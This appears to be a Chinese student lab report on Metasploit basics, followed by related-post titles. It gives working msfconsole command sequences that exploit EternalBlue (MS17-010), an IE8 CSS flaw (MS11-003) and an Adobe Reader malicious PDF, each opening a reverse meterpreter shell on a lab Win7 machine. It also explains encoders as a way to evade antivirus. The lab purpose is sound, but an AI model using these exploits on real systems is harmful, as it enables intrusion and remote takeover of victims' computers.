目录

  • 一、实践内容
    • 1 一个主动攻击实践
      • 0 安装Win7虚拟机
      • 1 攻击前的准备
        • 1.1 关闭Win7防火墙
        • 1.2 打开445端口
        • 1.3 查看靶机IP地址
      • 2 执行攻击
    • 2 一个针对浏览器的攻击(新,用这个)
    • 2 一个针对浏览器的攻击(废弃)
    • 3 一个针对客户端的攻击,已adobe reader为例
    • 4 辅助模块的使用
  • 二、问题回答
    • 1 用自己的话解释什么是exploit,payload,encode
    • 2 实践总结与体会
    • 3 离实战还缺些什么技术或步骤?

一、实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

1 一个主动攻击实践

使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞介绍
在微软官方的漏洞库中,有此漏洞的介绍与补丁,补丁编号:KB4013389。永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一个底层服务的漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本实验使用 Win7 作为靶机来进行渗透测试 Win7 环境说明:IP 地址 192.168.81.129 ,防火墙状态关闭。

0 安装Win7虚拟机

如果已经安装,跳过此步

本实验使用了Win7英文版的虚拟机,因此需要大家安装一下。过程并不繁琐,文件在3个G左右

迅雷下载种子:

ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/

自行安装即可,如果使用VM,可以进行“简易安装”,实现一键部署。

1 攻击前的准备

1.1 关闭Win7防火墙

1.2 打开445端口

具体操作请参考:链接

1.3 查看靶机IP地址

ipconfig

2 执行攻击

我们先看一下,靶机是否有这个漏洞

nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.81.129这是Win7的地址

结果如下,我们可以看到,有此漏洞

进入metasploit的命令是msfconfig
我们先看一下这个漏洞对应的MSF板块是哪些:

msf6 > search ms17_010


下面选择对应MSF板块,设置靶机ip地址,执行攻击:

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.81.129是Win7的IP地址
exploit

执行结果如下:

如上图所示,我们成功获得了目标主机的shell命令行,可以执行相关命令。

2 一个针对浏览器的攻击(新,用这个)

使用微软ms11-003漏洞

ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。

kali(192.168.81.133)
靶机:Windows 7+IE 8
攻击软件:metasploit

代码块:

//选择模块
use exploit/windows/browser/ms11_003_ie_css_import
//设置playload
set payload windows/meterpreter/reverse_tcp
//这是kali的地址
set srvhost 192.168.68.133
//也是kali的地址
set lhost 192.168.68.133
//下面的数字可以修改为学号
set uripath 2213

结果如下,我们获得了一个url链接:

之后:
在win7中,用IE访问:

在kali中,会有如下反映:

此时,执行:

sessions


选择1

sessions -i 1

获取到了shell

注意:如果sessions -i 1没成功,就试试sessions -i 2或者其他的~~


成功!

2 一个针对浏览器的攻击(废弃)

还是使用永恒之蓝ms17_010_eternalblue

kali(192.168.81.133)
靶机:Windows 7+IE 8(192.168.81.129)
攻击软件:metasploit

我们先看一下,靶机是否有这个漏洞

nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.81.129这是Win7的地址

然后开始进行相应的攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.81.129这是Win7的地址
set LPORT 2213
set payload generic/shell_reverse_tcp
show options
exploit

使用win7的IE浏览器访问kali的ip地址192.168.81.133

之后,在kali中,就获取到了win7的命令行:

攻击成功!

3 一个针对客户端的攻击,已adobe reader为例

漏洞:adobe_cooltype_sing
安装adobe reader,安装包已经发在群中。

之后,执行以下命令:

use exploit/windows/fileformat/adobe_cooltype_sing //进入攻击模块
set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
set LPORT 2213
set FILENAME 20192213lzq.pdf
set target 0
exploit

执行结果如下:

将文件复制到win7中

然后,我们进行监听,在msfconsole里输入back,可以返回上一级
然后输入:

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
set LHOST 192.168.81.133 //设置攻击机IP地址
set LPORT 2213 //设置端口号
exploit //攻击

此时,在win7中使用adobe reader9.0打开该pdf文件:

获取到了目标的命令行:

如上图所示,攻击成功!

4 辅助模块的使用

metasploitauxiliary(辅助模块): 包含扫描fuzz测试漏洞挖掘⽹络协议欺骗等程序。
本例相对简单,建议大家使用不同的方式对自己的系统进行扫描。

可以参考这篇文章,里面介绍了许多功能的具体使用方法

下面,使用PortScan进行端口扫描
命令如下:

use auxiliary/scanner/portscan/tcp
show opticons
set rhosts 目标IP地址
exploit

结果如下

我们可以看到,metasploit帮助我们获取了目标已经开放的端口,由此我们可以推测出靶机可能存在的漏洞和可能提供的服务,进而完成后续攻击。

二、问题回答

1 用自己的话解释什么是exploit,payload,encode

  • exploit:就是渗透攻击。这个模块下面有针对各种平台各种软件下的漏洞开发的渗透攻击子模块,用户可以调用某一个对靶机进行攻击。
  • payload:就是载荷。比如一个后门,通过什么平台下的基于什么软件的连接方式,可以通过此项来设置。
  • encode:就是一个编码器,把比如shellcode存在一些特征码,本来容易被靶机安全软件所察觉,用了这个编码器中的编码后就打乱了特征码,从而迷惑靶机。

2 实践总结与体会

此次实验尝试攻击了多个操作系统虚拟机,大都失败,原因可能是安装了补丁,同时部分攻击模块对中文操作系统支持不好,如果大家遇到了和我一样的问题,可以试试下载英文操作系统。

  • 本次实验耗时主要在复现环境搭建上,经过测试发现metasploit对中文系统支持不是很好,第一次攻击win7 pro中文版时没有成功,无论如何调试都提示:无法建立对话。之后按照网上提示,我安装了英文版win7,问题得以解决。

  • 与此同时,我尝试了攻击win server 2008,该系统在未打补丁的情况下也存在该漏洞,可惜由于我用的是腾讯服务器,没有自主配置防火墙的权限,因此攻击也没有成功。

  • 通过做这次实验,发现其实漏洞的年限都比较久远了,所攻击的系统也很久远,XP,win7都停服了。但这并不意味着现在用的最新系统就没有漏洞就不会有人攻击,这次实验收获是很大的。

3 离实战还缺些什么技术或步骤?

首先不建议针对其他人的主机进行实战攻击。
从本实验可以看出,所有过程都需要靶机的配合,需要关掉靶机的防火墙和杀软,有的还需要在靶机上进行一些操作,距离实战我们还需要绕过防火墙、骗过杀软的方法,缺少了这些技术方法,我们实验的攻击方案基本没法实现。
同时我们使用的系统版本较老,也没有更新、安装过相关安全补丁,并且必须开放某些特定端口。

Exp6 MSF应用基础相关推荐

  1. 2019-2020-2 20175 212童皓桢《网络对抗技术》Exp6 MSF基础应用

    2019-2020-2 20175212童皓桢<网络对抗技术> Exp6 MSF基础应用 目录 1. 实验目标 2. 实验内容 2.1 主动攻击实践 2.2 针对浏览器的攻击 2.3 针对 ...

  2. 【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

    目录 一.简介: 二.下载: 2.1.kali 2.2.官网: 2.3.GitHub: 三.启动方法 四.msf常用基础命令 五.msf结构 六. 核心命令: 一.简介: 很容易地获取.开发并对计算机 ...

  3. 内网渗透 Metasploit(MSF)基础使用

    内网渗透 Metasploit(MSF)使用 1.认识 MSF ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安 ...

  4. 20145309李昊《网络对抗》MSF应用基础

    实验内容 掌握metasploit的基本应用方式 1.主动攻击--ms08_067 2.针对浏览器的攻击--ms11_050 3.针对客户端的攻击--Adobe 4.成功应用一个辅助模块--scann ...

  5. Metasploit Framework(MSF)基础框架

    Metasploit简介 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗 ...

  6. 软件测试msf模型,Visual Studio 2010 Ultimate中MSF过程模型的设计

    Visual Studio 2010 Ultimate中MSF过程模型的设计 发表于:2010-04-06来源:作者:点击数: 过程模型是 软件工程 学中的一部分,就好比我们用什么过程方法进行软件&q ...

  7. Windows系统——ATTCK靶场(一)——MSF方式

    文章目录 前言 一.环境搭建 二.Web部分 三.内网部分(MSF方式) 四.横向移动(MSF方式) 五.总结笔记 前言 windows系统的靶场太少了,就在重做一遍巩固下windows内网相关的基础 ...

  8. 一、初识Metasploit(MSF使用详解超详细)

    前言:Metasploit是The Metasploit Framework的简称,也可以叫做MSF! MSF高度模块化即框架由多个module组成,是全球最受欢迎的工具. Metasploit Fr ...

  9. metasploit怎么用? 基础(auxiliary、exploits、meterpreter)篇 (゚益゚メ) 渗透测试

    文章目录 metasplit框架 msf结构介绍 进入msf msf常用基础命令 进入.管理工作台 搜索功能 信息收集 简单使用(测试漏洞为`ms17_010`) 辅助模块使用(`auxiliary` ...

最新文章

  1. java使用Calendar类获取常用简单工具类
  2. Spring-AOP 通过配置文件实现 引介增强
  3. 如何在xp中添加打印机
  4. 数据结构-树的进化及与数据库的关系
  5. python+php+变量传递,将变量从php传递给python,将python传递给php
  6. Java代码模拟实现购物车
  7. 简道云-第4章-表单实例
  8. 命名实体识别NER探索(5) Bert+BiLSTM+CRF模型实战应用
  9. 利用python爬取飞猪信息_飞猪爬虫项目
  10. 一文足矣:Unity行为树
  11. Spark Streaming官网重点整理
  12. 30个java编程小技巧
  13. 打砖块JAVA_运用java开发打砖块游戏
  14. html将四张图片合并,照片拼图在线制作 自带多种照片拼图模板,自由排版将多张照片合成一张...
  15. 操作系统中cpu如何工作
  16. 计算机学院宣传橱窗,校园橱窗、报栏、展板、宣传标语管理办法
  17. 腾讯新版 Windows QQ 首个公测版发布,采用全新 QQ NT 架构
  18. 数据安全--14--隐私保护治理浅析
  19. CSS颜色代码大全及a标签超链接颜色改变
  20. 在python中使用正则表达式

热门文章

  1. STM32串口发送Ctrl+C Ctrl+Z的方法
  2. H5-阿里云JSSDK集成、实现一键登录功能
  3. linux中realplayer.rpm格式的软件安装,Linux中安装Realplay 10.0 的方法
  4. java package 注解,如何添加包级别注释或编辑package-info.java?
  5. 双电阻差分电流采样_和顺海科技一起来了解采样电阻的用途和选型
  6. zabbix4.0之web监控
  7. 微信美食菜谱小程序系统毕业设计毕设(8)毕业设计论文模板
  8. 计算机睡眠模式游戏开着,win10,win7玩游戏频繁进入睡眠模式,求解。
  9. AngularJS小白(1):开发环境准备
  10. 私募基金合法吗?私募基金如何防风险?